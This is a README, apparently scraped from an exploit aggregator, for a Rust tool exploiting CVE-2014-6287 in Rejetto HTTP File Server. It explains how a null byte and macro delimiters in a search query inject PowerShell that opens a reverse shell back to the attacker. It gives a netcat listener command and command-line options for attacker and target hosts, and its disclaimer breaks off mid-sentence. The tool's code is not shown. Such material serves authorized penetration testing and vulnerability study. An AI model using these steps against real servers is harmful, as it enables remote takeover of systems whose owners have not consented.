Share
## https://sploitus.com/exploit?id=E5DECDE0-467B-56A8-8701-FD0817B2CA25
# CVE-2014-6287 - Rejetto HTTP File Server RCE Exploit

[![Rust](https://img.shields.io/badge/rust-%23000000.svg?style=for-the-badge&logo=rust&logoColor=white)](https://www.rust-lang.org/)
[![Security](https://img.shields.io/badge/Security-CVE--2014--6287-red?style=for-the-badge)](https://vulners.com/cve/CVE-2014-6287)

A Rust implementation of the CVE-2014-6287 exploit targeting Rejetto HTTP File Server (HFS) versions 2.3x before 2.3c.

## Vulnerability Overview

**CVE-2014-6287** is a critical remote code execution vulnerability in Rejetto HTTP File Server (HFS).

### Technical Details

- **Affected Software**: Rejetto HTTP File Server (HFS) 2.3x before 2.3c
- **Vulnerability Type**: Remote Code Execution (RCE)
- **CVSS Score**: 10.0 (Critical)
- **CWE**: CWE-94 (Improper Control of Generation of Code)

### Description

The `findMacroMarker` function in `parserLib.pas` in Rejetto HTTP File Server allows remote attackers to execute arbitrary programs via a `%00` sequence in a search action. This vulnerability enables attackers to bypass input validation and inject malicious code that gets executed on the target system.

The exploit works by:
1. Crafting a malicious search query containing a null byte (`%00`)
2. Injecting PowerShell commands within macro delimiters `{.` and `.}`
3. The server processes the macro and executes the embedded PowerShell code
4. Establishing a reverse shell connection back to the attacker

## Usage

### Step 1: Set up a Netcat Listener

Before executing the exploit, set up a listener on your attacking machine to catch the reverse shell:

```bash
# Replace  with your desired listening port
nc -lvnp 
```
### Step 2: Execute the Exploit

```bash
cargo run -- -l  -p  -r  [-t ]
```

#### Required Parameters:
- `-l, --lhost `: Your local IP address (attacker machine)
- `-p, --lport `: Your local port for the reverse shell
- `-r, --rhost `: Target IP address (vulnerable HFS server)

#### Optional Parameters:
- `-t, --rport `: Target port (default: 80)


## Disclaimer

This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to